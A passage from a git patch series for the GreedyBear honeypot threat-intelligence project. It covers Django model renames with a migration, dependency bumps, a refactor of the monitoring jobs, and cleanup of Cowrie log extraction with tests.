+        sensor = Sensor(address=ip)
         sensor.save()
         self.cache.add(ip)
         self.log.info(f"added sensor {ip} to the database")
@@ -55,4 +55,4 @@ def add_sensor(self, ip: str) -> bool:
     def _fill_cache(self) -> None:
         """Load sensor addresses from the database into the cache."""
         self.log.debug("populating sensor cache")
-        self.cache = {s.address for s in Sensors.objects.all()}
+        self.cache = {s.address for s in Sensor.objects.all()}
diff --git a/greedybear/cronjobs/whatsmyip.py b/greedybear/cronjobs/whatsmyip.py
index ef63734a..3dc00b57 100644
--- a/greedybear/cronjobs/whatsmyip.py
+++ b/greedybear/cronjobs/whatsmyip.py
@@ -1,6 +1,6 @@
 import requests
 from greedybear.cronjobs.base import Cronjob
-from greedybear.models import IOC, WhatsMyIP
+from greedybear.models import IOC, WhatsMyIPDomain
 
 
 class WhatsMyIPCron(Cronjob):
@@ -9,10 +9,10 @@ def run(self) -> None:
         json_file = r.json()
         for domain in json_file["list"]:
             try:
-                WhatsMyIP.objects.get(domain=domain)
-            except WhatsMyIP.DoesNotExist:
+                WhatsMyIPDomain.objects.get(domain=domain)
+            except WhatsMyIPDomain.DoesNotExist:
                 self.log.info(f"added new whatsmyip domain {domain=}")
-                WhatsMyIP(domain=domain).save()
+                WhatsMyIPDomain(domain=domain).save()
                 self._remove_old_ioc(domain)
 
     def _remove_old_ioc(self, domain):
diff --git a/greedybear/migrations/0023_rename_massscanners_massscanner_and_more.py b/greedybear/migrations/0023_rename_massscanners_massscanner_and_more.py
new file mode 100644
index 00000000..6dc9ae7f
--- /dev/null
+++ b/greedybear/migrations/0023_rename_massscanners_massscanner_and_more.py
@@ -0,0 +1,48 @@
+# Generated by Django 5.2.8 on 2025-12-22 15:44
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+    dependencies = [
+        ("greedybear", "0022_whatsmyip"),
+    ]
+
+    operations = [
+        migrations.RenameModel(
+            old_name="MassScanners",
+            new_name="MassScanner",
+        ),
+        migrations.RenameModel(
+            old_name="Sensors",
+            new_name="Sensor",
+        ),
+        migrations.RenameModel(
+            old_name="WhatsMyIP",
+            new_name="WhatsMyIPDomain",
+        ),
+        migrations.RenameIndex(
+            model_name="massscanner",
+            new_name="greedybear__ip_addr_3c3fd4_idx",
+            old_name="greedybear__ip_addr_2aa484_idx",
+        ),
+        migrations.RenameIndex(
+            model_name="whatsmyipdomain",
+            new_name="greedybear__domain_7f23b0_idx",
+            old_name="greedybear__domain_f89b04_idx",
+        ),
+        migrations.AlterField(
+            model_name="statistics",
+            name="view",
+            field=models.CharField(
+                choices=[
+                    ("feeds", "Feeds View"),
+                    ("enrichment", "Enrichment View"),
+                    ("command sequence", "Command Sequence View"),
+                    ("cowrie session", "Cowrie Session View"),
+                ],
+                default="feeds",
+                max_length=32,
+            ),
+        ),
+    ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 18e6c4f9..348d3956 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -18,7 +18,7 @@ class iocType(models.TextChoices):
     DOMAIN = "domain"
 
 
-class Sensors(models.Model):
+class Sensor(models.Model):
     address = models.CharField(max_length=15, blank=False)
 
 
@@ -104,7 +104,7 @@ class Statistics(models.Model):
     request_date = models.DateTimeField(blank=False, default=datetime.now)
 
 
-class MassScanners(models.Model):
+class MassScanner(models.Model):
     ip_address = models.CharField(max_length=256, blank=False)
     added = models.DateTimeField(blank=False, default=datetime.now)
     reason = models.CharField(max_length=64, blank=True, null=True)
@@ -115,7 +115,7 @@ class Meta:
         ]
 
 
-class WhatsMyIP(models.Model):
+class WhatsMyIPDomain(models.Model):
     domain = models.CharField(max_length=256, blank=False)
     added = models.DateTimeField(blank=False, default=datetime.now)
 
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 7cd93373..133f0945 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -3,7 +3,7 @@
 
 from greedybear.consts import DOMAIN, IP
 from greedybear.cronjobs.extraction.utils import correct_ip_reputation, get_ioc_type, iocs_from_hits, is_whatsmyip_domain, threatfox_submission
-from greedybear.models import MassScanners, WhatsMyIP
+from greedybear.models import MassScanner, WhatsMyIPDomain
 
 from . import CustomTestCase, ExtractionTestCase
 
@@ -30,7 +30,7 @@ def test_invalid_ip_returns_domain(self):
 
 class TestIsWhatsmyipDomain(CustomTestCase):
     def test_returns_true_for_known_domain(self):
-        WhatsMyIP.objects.create(domain="some.domain.com")
+        WhatsMyIPDomain.objects.create(domain="some.domain.com")
         result = is_whatsmyip_domain("some.domain.com")
         self.assertTrue(result)
 
@@ -41,7 +41,7 @@ def test_returns_false_for_unknown_domain(self):
 
 class TestCorrectIpReputationTestCase(CustomTestCase):
     def test_returns_mass_scanner_when_in_database(self):
-        MassScanners.objects.create(ip_address="1.2.3.4")
+        MassScanner.objects.create(ip_address="1.2.3.4")
         result = correct_ip_reputation("1.2.3.4", "known attacker")
         self.assertEqual(result, "mass scanner")
 
@@ -50,12 +50,12 @@ def test_returns_original_when_not_in_database(self):
         self.assertEqual(result, "known attacker")
 
     def test_checks_mass_scanner_for_empty_reputation(self):
-        MassScanners.objects.create(ip_address="1.2.3.4")
+        MassScanner.objects.create(ip_address="1.2.3.4")
         result = correct_ip_reputation("1.2.3.4", "")
         self.assertEqual(result, "mass scanner")
 
     def test_preserves_other_reputations(self):
-        MassScanners.objects.create(ip_address="1.2.3.4")
+        MassScanner.objects.create(ip_address="1.2.3.4")
         result = correct_ip_reputation("1.2.3.4", "bot")
         self.assertEqual(result, "bot")
 
@@ -219,7 +219,7 @@ def test_non_heralding_no_login_attempts(self):
         self.assertEqual(iocs[0].login_attempts, 0)
 
     def test_corrects_ip_reputation(self):
-        MassScanners.objects.create(ip_address="8.8.8.8")
+        MassScanner.objects.create(ip_address="8.8.8.8")
         hits = [self._create_hit(src_ip="8.8.8.8", ip_rep="known attacker")]
         iocs = iocs_from_hits(hits)
         self.assertEqual(iocs[0].ip_reputation, "mass scanner")
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index d1f10bf0..f39e38a2 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -2,7 +2,7 @@
 from unittest.mock import Mock, patch
 
 from greedybear.cronjobs.repositories import CowrieSessionRepository, ElasticRepository, IocRepository, SensorRepository, get_time_window
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, Sensors
+from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, Sensor
 
 from . import CustomTestCase
 
@@ -129,28 +129,28 @@ def test_sensors_property_returns_cached_sensors(self):
     def test_add_sensor_creates_new_sensor(self):
         result = self.repo.add_sensor("192.168.1.3")
         self.assertTrue(result)
-        self.assertTrue(Sensors.objects.filter(address="192.168.1.3").exists())
+        self.assertTrue(Sensor.objects.filter(address="192.168.1.3").exists())
         self.assertIn("192.168.1.3", self.repo.cache)
 
     def test_add_sensor_returns_false_for_existing_sensor(self):
         self.repo.add_sensor("192.168.1.1")
         result = self.repo.add_sensor("192.168.1.1")
         self.assertFalse(result)
-        self.assertEqual(Sensors.objects.filter(address="192.168.1.1").count(), 1)
+        self.assertEqual(Sensor.objects.filter(address="192.168.1.1").count(), 1)
 
     def test_add_sensor_rejects_non_ip(self):
         result = self.repo.add_sensor("not-an-ip")
         self.assertFalse(result)
-        self.assertFalse(Sensors.objects.filter(address="not-an-ip").exists())
+        self.assertFalse(Sensor.objects.filter(address="not-an-ip").exists())
 
     def test_add_sensor_rejects_domain(self):
         result = self.repo.add_sensor("example.com")
         self.assertFalse(result)
-        self.assertFalse(Sensors.objects.filter(address="example.com").exists())
+        self.assertFalse(Sensor.objects.filter(address="example.com").exists())
 
     def test_cache_populated_on_init(self):
-        Sensors.objects.create(address="192.168.1.1")
-        Sensors.objects.create(address="192.168.1.2")
+        Sensor.objects.create(address="192.168.1.1")
+        Sensor.objects.create(address="192.168.1.2")
         repo = SensorRepository()
         self.assertEqual(len(repo.cache), 2)
         self.assertIn("192.168.1.1", repo.cache)

From 8f2edf1d4dd3f9feca9e8eba4b920e3a715754bc Mon Sep 17 00:00:00 2001
From: srijan <141031709+srijan2607@users.noreply.github.com>
Date: Tue, 23 Dec 2025 20:55:39 +0530
Subject: [PATCH 07/75] fix: remove orphaned api_view decorator in feeds.py
 (#649)

---
 api/views/feeds.py | 2 --
 1 file changed, 2 deletions(-)

diff --git a/api/views/feeds.py b/api/views/feeds.py
index 1e953e26..34a1bda4 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -11,8 +11,6 @@
 
 logger = logging.getLogger(__name__)
 
-api_view([GET])
-
 
 @api_view([GET])
 def feeds(request, feed_type, attack_type, prioritize, format_):

From d942e61bdea29d2a66fc154f3f32b57988125d64 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Dec 2025 19:37:42 +0100
Subject: [PATCH 08/75] Bump library/nginx from 1.29.3-alpine to 1.29.4-alpine
 in /docker (#618)

Bumps library/nginx from 1.29.3-alpine to 1.29.4-alpine.

---
updated-dependencies:
- dependency-name: library/nginx
  dependency-version: 1.29.4-alpine
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 docker/Dockerfile_nginx | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docker/Dockerfile_nginx b/docker/Dockerfile_nginx
index c1a53bdf..049ea8c9 100644
--- a/docker/Dockerfile_nginx
+++ b/docker/Dockerfile_nginx
@@ -1,4 +1,4 @@
-FROM library/nginx:1.29.3-alpine
+FROM library/nginx:1.29.4-alpine
 RUN mkdir -p /var/cache/nginx /var/cache/nginx/feeds
 RUN apk update && apk upgrade && apk add bash
 ENV NGINX_LOG_DIR=/var/log/nginx

From ed96b970db9da3f8d8266c1a1977aaf023d23055 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Dec 2025 19:38:20 +0100
Subject: [PATCH 09/75] Bump celery from 5.5.3 to 5.6.0 in /requirements (#605)

Bumps [celery](https://github.com/celery/celery) from 5.5.3 to 5.6.0.
- [Release notes](https://github.com/celery/celery/releases)
- [Changelog](https://github.com/celery/celery/blob/main/Changelog.rst)
- [Commits](https://github.com/celery/celery/compare/v5.5.3...v5.6.0)

---
updated-dependencies:
- dependency-name: celery
  dependency-version: 5.6.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index f87af4a1..b2ebf2d9 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,4 +1,4 @@
-celery==5.5.3
+celery==5.6.0
 
 # if you change this, update the documentation
 elasticsearch8==8.19.2

From 2f3a04c8afe9553703b3ed4538ad4d4b41df167c Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Dec 2025 19:38:33 +0100
Subject: [PATCH 10/75] Bump slack-sdk from 3.37.0 to 3.39.0 in /requirements
 (#598)

Bumps [slack-sdk](https://github.com/slackapi/python-slack-sdk) from 3.37.0 to 3.39.0.
- [Release notes](https://github.com/slackapi/python-slack-sdk/releases)
- [Commits](https://github.com/slackapi/python-slack-sdk/compare/v3.37.0...v3.39.0)

---
updated-dependencies:
- dependency-name: slack-sdk
  dependency-version: 3.39.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index b2ebf2d9..2788c656 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -11,7 +11,7 @@ django-ses==4.4.0
 psycopg2-binary==2.9.11
 
 certego-saas==0.7.11
-slack-sdk==3.37.0
+slack-sdk==3.39.0
 
 uwsgitop==0.12
 uwsgi==2.0.31

From 8bde224917f95a47c05a684c0e09dac8f4ba4357 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 23 Dec 2025 19:55:42 +0100
Subject: [PATCH 11/75] Fix monitoring jobs. Closes #648 (#651)

* add function to retrieve active honeypots in IocRepository

* move standard elastic querying to separate method

* add method to check log existence for given honeypot

* adapt MonitorHoneypots class to repository pattern

* refactor MonitorLogs
---
 greedybear/cronjobs/monitor_honeypots.py    | 50 +++++++++--------
 greedybear/cronjobs/monitor_logs.py         | 60 +++++++++++++--------
 greedybear/cronjobs/repositories/elastic.py | 46 ++++++++++++++--
 greedybear/cronjobs/repositories/ioc.py     |  9 ++++
 4 files changed, 117 insertions(+), 48 deletions(-)

diff --git a/greedybear/cronjobs/monitor_honeypots.py b/greedybear/cronjobs/monitor_honeypots.py
index 04779330..597cb3c8 100644
--- a/greedybear/cronjobs/monitor_honeypots.py
+++ b/greedybear/cronjobs/monitor_honeypots.py
@@ -1,28 +1,36 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
-from greedybear.cronjobs.base import ElasticJob
-from greedybear.cronjobs.honeypots import Honeypot
-from greedybear.models import GeneralHoneypot
+from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.repositories import ElasticRepository, IocRepository
 
 
-class MonitorHoneypots(ElasticJob):
-    def __init__(self):
-        super(MonitorHoneypots, self).__init__()
-        self.honeypots_to_monitor = [Honeypot("Log4pot"), Honeypot("Cowrie")]
-        # FEEDS - add monitor for all general honeypots from list
-        general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
-        for hp in general_honeypots:
-            self.honeypots_to_monitor.append(Honeypot(hp.name))
+class MonitorHoneypots(Cronjob):
+    """Monitor active honeypots for recent log activity."""
 
-    @property
-    def minutes_back_to_lookup(self):
-        return 60
+    def __init__(
+        self,
+        ioc_repo: IocRepository | None = None,
+        elastic_repo: ElasticRepository | None = None,
+        minutes_back: int = 60,
+    ):
+        """Initialize the monitoring.
 
-    def run(self):
-        for honeypot_to_monitor in self.honeypots_to_monitor:
-            self.log.info(f"checking if logs from the honeypot {honeypot_to_monitor.name} are available")
-            search = self._base_search(honeypot_to_monitor)
+        Args:
+            ioc_repo: Repository for accessing known honeypots.
+            elastic_repo: Repository for querying Elasticsearch logs.
+            minutes_back: Time window in minutes to check for activity.
+        """
+        super().__init__()
+        self.ioc_repo = ioc_repo or IocRepository()
+        self.elastic_repo = elastic_repo or ElasticRepository()
+        self.minutes_back = minutes_back
 
-            hits = search[:10].execute()
-            if not hits:
-                self.log.warning(f"no logs available for the Honeypot {honeypot_to_monitor.name}." f" Something could be wrong in the TPOT cluster")
+    def run(self):
+        """Check all active honeypots for recent log activity."""
+        for honeypot in self.ioc_repo.get_active_honeypots():
+            honeypot_name = honeypot.name
+            self.log.info(f"checking if logs from the honeypot {honeypot} are available")
+            if self.elastic_repo.has_honeypot_been_hit(self.minutes_back, honeypot_name):
+                self.log.info(f"logs available for {honeypot}")
+                continue
+            self.log.warning(f"no logs available for {honeypot} - something could be wrong with T-Pot")
diff --git a/greedybear/cronjobs/monitor_logs.py b/greedybear/cronjobs/monitor_logs.py
index 7906602b..b6de87bb 100644
--- a/greedybear/cronjobs/monitor_logs.py
+++ b/greedybear/cronjobs/monitor_logs.py
@@ -1,35 +1,51 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
 from datetime import datetime, timedelta
-from os.path import getmtime
+from pathlib import Path
 
-from greedybear.cronjobs.base import ElasticJob
+from greedybear.cronjobs.base import Cronjob
 from greedybear.slack import send_message
 
 
-class MonitorLogs(ElasticJob):
-    def __init__(self):
-        super(MonitorLogs, self).__init__()
-        self.logs_to_monitor = ["greedybear", "api", "django", "celery"]
-        self.log_directory = "/var/log/greedybear/django/"
+class MonitorLogs(Cronjob):
+    """Monitor error log files for recent activity indicating errors."""
+
+    def __init__(
+        self,
+        log_directory: str = "/var/log/greedybear/django/",
+        check_window_minutes: int = 60,
+    ):
+        """Initialize the log monitoring.
 
-    @property
-    def minutes_back_to_lookup(self):
-        return 61
+        Args:
+            log_directory: Directory containing error log files.
+            check_window_minutes: Time window in minutes to check for log modifications.
+        """
+        super().__init__()
+        self.log_directory = Path(log_directory)
+        self.check_window_minutes = check_window_minutes
+        self.logs_to_monitor = ["greedybear", "api", "django", "celery"]
 
     def run(self):
-        for log_to_monitor in self.logs_to_monitor:
-            log_file = log_to_monitor + "_errors.log"
+        """Check error logs for recent modifications and alert via Slack."""
+        cutoff_time = datetime.now() - timedelta(minutes=self.check_window_minutes)
+        self.log.info(f"checking {len(self.logs_to_monitor)} error logs for activity since {cutoff_time}")
+
+        for log_name in self.logs_to_monitor:
+            log_file = f"{log_name}_errors.log"
+            log_path = self.log_directory / log_file
+
+            if not log_path.exists():
+                self.log.warning(f"log file not found: {log_path}")
+                continue
+
             self.log.info(f"checking if the log {log_file} was populated in the last hour")
-            last_modification_time = getmtime(self.log_directory + log_file)
-            last_modification_datetime = datetime.fromtimestamp(last_modification_time)
-            one_hour_ago = datetime.today() - timedelta(minutes=self.minutes_back_to_lookup)
-            self.log.info(
-                f"modification time {last_modification_time}"
-                f" ({last_modification_datetime}) for {log_file}."
-                f" Checking if it is greater than {one_hour_ago}"
-            )
-            if last_modification_datetime > one_hour_ago:
+            last_modified = datetime.fromtimestamp(log_path.stat().st_mtime)
+            self.log.info(f"file {log_file} was modified at {last_modified}")
+
+            if last_modified > cutoff_time:
                 message = f"found errors in log file {log_file}"
-                self.log.info(message)
+                self.log.warning(message)
                 send_message(message)
+            else:
+                self.log.debug(f"no recent activity in {log_file}")
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index ac4ac216..37e7f008 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -28,7 +28,26 @@ def __init__(self):
         self.elastic_client = settings.ELASTIC_CLIENT
         self.search_cache = dict()
 
-    def search(self, minutes_back_to_lookup: int):
+    def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str) -> bool:
+        """
+        Check if a specific honeypot has been hit within a given time window.
+
+        Args:
+            minutes_back_to_lookup: Number of minutes to look back from the current
+                time when searching for honeypot hits.
+            honeypot_name: The  name/type of the honeypot to check for hits.
+
+        Returns:
+            True if at least one hit was recorded for the specified honeypot within
+            the time window, False otherwise.
+        """
+        search = Search(using=self.elastic_client, index="logstash-*")
+        q = self._standard_query(minutes_back_to_lookup)
+        search = search.query(q)
+        search = search.filter("term", **{"type.keyword": honeypot_name})
+        return search.count() > 0
+
+    def search(self, minutes_back_to_lookup: int) -> list:
         """
         Search for log entries within a specified time window.
 
@@ -64,10 +83,7 @@ def search(self, minutes_back_to_lookup: int):
                 minimum_should_match=1,
             )
         else:
-            self.log.debug("querying elastic using standard method")
-            window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
-            self.log.debug(f"time window: {window_start} - {window_end}")
-            q = Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
+            q = self._standard_query(minutes_back_to_lookup)
 
         search = search.query(q)
         search.source(REQUIRED_FIELDS)
@@ -78,6 +94,26 @@ def search(self, minutes_back_to_lookup: int):
         self.search_cache[minutes_back_to_lookup] = result
         return result
 
+    def _standard_query(self, minutes_back_to_lookup: int) -> Q:
+        """
+        Builds an Elasticsearch query that filters documents based on their
+        @timestamp field, searching backwards from the current time for the
+        specified number of minutes.
+
+        Args:
+            minutes_back_to_lookup: Number of minutes to look back from the
+                current time. Defines the size of the time window to search.
+
+        Returns:
+            Q: An elasticsearch-dsl Query object with a range filter on the
+            @timestamp field. The range spans from (now - minutes_back_to_lookup)
+            to now.
+        """
+        self.log.debug("querying elastic using standard method")
+        window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
+        self.log.debug(f"time window: {window_start} - {window_end}")
+        return Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
+
     def _healthcheck(self):
         """
         Verify Elasticsearch connectivity.
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 8af85691..45bb41a3 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -54,6 +54,15 @@ def create_honeypot(self, honeypot_name: str) -> GeneralHoneypot:
         self._honeypot_cache[honeypot_name] = True
         return honeypot
 
+    def get_active_honeypots(self) -> list[GeneralHoneypot]:
+        """
+        Retrieve a list of all active honeypots.
+
+        Returns:
+            A list of all active honeypots in the database.
+        """
+        return list(GeneralHoneypot.objects.filter(active=True))
+
     def get_ioc_by_name(self, name: str) -> Optional[IOC]:
         """
         Retrieve an IOC by its name.

From 92a90147a7cc1846a4f03d5a11c06fb859bcab6a Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Dec 2025 19:58:09 +0100
Subject: [PATCH 12/75] Bump datasketch from 1.7.0 to 1.8.0 in /requirements
 (#604)

Bumps [datasketch](https://github.com/ekzhu/datasketch) from 1.7.0 to 1.8.0.
- [Release notes](https://github.com/ekzhu/datasketch/releases)
- [Commits](https://github.com/ekzhu/datasketch/compare/v1.7.0...v1.8.0)

---
updated-dependencies:
- dependency-name: datasketch
  dependency-version: 1.8.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 2788c656..c1ccc559 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -20,4 +20,4 @@ joblib==1.5.2
 pandas==2.3.3
 scikit-learn==1.7.2
 numpy==2.3.5
-datasketch==1.7.0
+datasketch==1.8.0

From 01ddcb68e44ffabf5baed6da22df54ab9ac329a4 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Dec 2025 20:07:06 +0100
Subject: [PATCH 13/75] Bump scikit-learn from 1.7.2 to 1.8.0 in /requirements
 (#620)

Bumps [scikit-learn](https://github.com/scikit-learn/scikit-learn) from 1.7.2 to 1.8.0.
- [Release notes](https://github.com/scikit-learn/scikit-learn/releases)
- [Commits](https://github.com/scikit-learn/scikit-learn/compare/1.7.2...1.8.0)

---
updated-dependencies:
- dependency-name: scikit-learn
  dependency-version: 1.8.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index c1ccc559..fcd1bf16 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -18,6 +18,6 @@ uwsgi==2.0.31
 
 joblib==1.5.2
 pandas==2.3.3
-scikit-learn==1.7.2
+scikit-learn==1.8.0
 numpy==2.3.5
 datasketch==1.8.0

From b4b160d44e5a641543e782aaab67220505253143 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 23 Dec 2025 20:07:24 +0100
Subject: [PATCH 14/75] Bump django-ses from 4.4.0 to 4.5.0 in /requirements
 (#619)

Bumps [django-ses](https://github.com/django-ses/django-ses) from 4.4.0 to 4.5.0.
- [Release notes](https://github.com/django-ses/django-ses/releases)
- [Changelog](https://github.com/django-ses/django-ses/blob/main/CHANGES.md)
- [Commits](https://github.com/django-ses/django-ses/compare/v4.4.0...v4.5.0)

---
updated-dependencies:
- dependency-name: django-ses
  dependency-version: 4.5.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index fcd1bf16..df078e9b 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -6,7 +6,7 @@ elasticsearch8==8.19.2
 Django==5.2.8
 djangorestframework==3.16.1
 django-rest-email-auth==5.0.0
-django-ses==4.4.0
+django-ses==4.5.0
 
 psycopg2-binary==2.9.11
 

From 0b40ff0530db1bf4e59fab7407eb5988410350a1 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 24 Dec 2025 02:06:05 +0530
Subject: [PATCH 15/75] Refactor CowrieExtractionStrategy and add comprehensive
 tests (#639)

* Refactor CowrieExtractionStrategy and add comprehensive tests

* refactor: address code review feedback

- Consolidate cowrie_parser.py into cowrie.py
- Remove CowrieSessionData class, use models directly
- Add helper functions and comprehensive tests (25 tests)
- Use defaultdict, removeprefix, and clean up comments

All 265 tests passing

* refactor: address additional code review feedback

- Add warning log when IOCs missing in _add_fks
- Remove redundant duplicate checks (Django handles it)
- Remove redundant scanner tracking in _get_url_downloads
- Optimize payload extraction from O(N*M) to O(M)
- Document 1024 char truncation reason
- Add test for empty hits edge case

All 266 tests passing
---
 .../cronjobs/extraction/strategies/cowrie.py  | 270 +++++++++-----
 greedybear/regex.py                           |   2 +-
 tests/greedybear/__init__.py                  |   1 +
 tests/greedybear/cronjobs/__init__.py         |   1 +
 tests/test_cowrie_extraction.py               | 343 ++++++++++++++++++
 5 files changed, 535 insertions(+), 82 deletions(-)
 create mode 100644 tests/greedybear/__init__.py
 create mode 100644 tests/greedybear/cronjobs/__init__.py
 create mode 100644 tests/test_cowrie_extraction.py

diff --git a/greedybear/cronjobs/extraction/strategies/cowrie.py b/greedybear/cronjobs/extraction/strategies/cowrie.py
index 9ba7808b..dd29cd24 100644
--- a/greedybear/cronjobs/extraction/strategies/cowrie.py
+++ b/greedybear/cronjobs/extraction/strategies/cowrie.py
@@ -3,6 +3,7 @@
 import re
 from collections import defaultdict
 from hashlib import sha256
+from typing import Optional
 from urllib.parse import urlparse
 
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
@@ -13,12 +14,58 @@
 from greedybear.regex import REGEX_URL_PROTOCOL
 
 
+def parse_url_hostname(url: str) -> Optional[str]:
+    """
+    Extract hostname from URL safely.
+
+    Args:
+        url: URL string to parse
+
+    Returns:
+        Hostname if parsing succeeds, None otherwise
+    """
+    try:
+        parsed = urlparse(url)
+        return parsed.hostname
+    except (ValueError, AttributeError):
+        return None
+
+
+def normalize_command(message: str) -> str:
+    """
+    Normalize command string by removing CMD prefix and null characters.
+
+    Args:
+        message: Raw command message string
+
+    Returns:
+        Normalized command string, truncated to 1024 characters
+    """
+    # Truncate to 1024 chars to match CommandSequence.commands field max_length
+    return message.removeprefix("CMD: ").replace("\x00", "[NUL]")[:1024]
+
+
+def normalize_credential_field(field: str) -> str:
+    """
+    Normalize credential fields by replacing null characters.
+
+    Args:
+        field: Credential field string
+
+    Returns:
+        Normalized credential field
+    """
+    return field.replace("\x00", "[NUL]")
+
+
 class CowrieExtractionStrategy(BaseExtractionStrategy):
     """
     Extraction strategy for Cowrie SSH/Telnet honeypot.
-    Extracts scanner IPs, payload URLs from login attempts and file downloads,
-    and session data including credentials and command sequences. Links related
-    IOCs (scanners to download URLs) and deduplicates command sequences by hash.
+
+    Extracts scanner IPs, payload URLs from login attempts and file
+    downloads, and session data including credentials and command
+    sequences. Links related IOCs (scanners to download URLs) and
+    deduplicates command sequences by hash.
     """
 
     def __init__(
@@ -31,20 +78,25 @@ def __init__(
         super().__init__(honeypot, ioc_repo, sensor_repo)
         self.session_repo = session_repo or CowrieSessionRepository()
         self.payloads_in_message = 0
-        self.added_ip_downloads = 0
         self.added_url_downloads = 0
 
     def extract_from_hits(self, hits: list[dict]) -> None:
+        """
+        Main extraction entry point. Processes hits and extracts scanners,
+        payloads, downloads, and sessions.
+
+        Args:
+            hits: List of Elasticsearch hit documents
+        """
         self._get_scanners(hits)
+        self._extract_possible_payload_in_messages(hits)
         self._get_url_downloads(hits)
         self.log.info(
-            f"added {len(self.ioc_records)} scanners, "
-            f"{self.payloads_in_message} payload found in messages, "
-            f"{self.added_ip_downloads} IP that tried to download, "
-            f"{self.added_url_downloads} URL to download"
+            f"added {len(self.ioc_records)} scanners, " f"{self.payloads_in_message} payloads found in messages, " f"{self.added_url_downloads} download URLs"
         )
 
     def _get_scanners(self, hits: list[dict]) -> None:
+        """Extract scanner IPs and sessions."""
         for ioc in iocs_from_hits(hits):
             ioc.cowrie = True
             self.log.info(f"found IP {ioc.name} by honeypot cowrie")
@@ -52,48 +104,73 @@ def _get_scanners(self, hits: list[dict]) -> None:
             if ioc_record:
                 self.ioc_records.append(ioc_record)
                 threatfox_submission(ioc_record, ioc.related_urls, self.log)
-                self._extract_possible_payload_in_messages(ioc_record.name, hits)
                 self._get_sessions(ioc_record, hits)
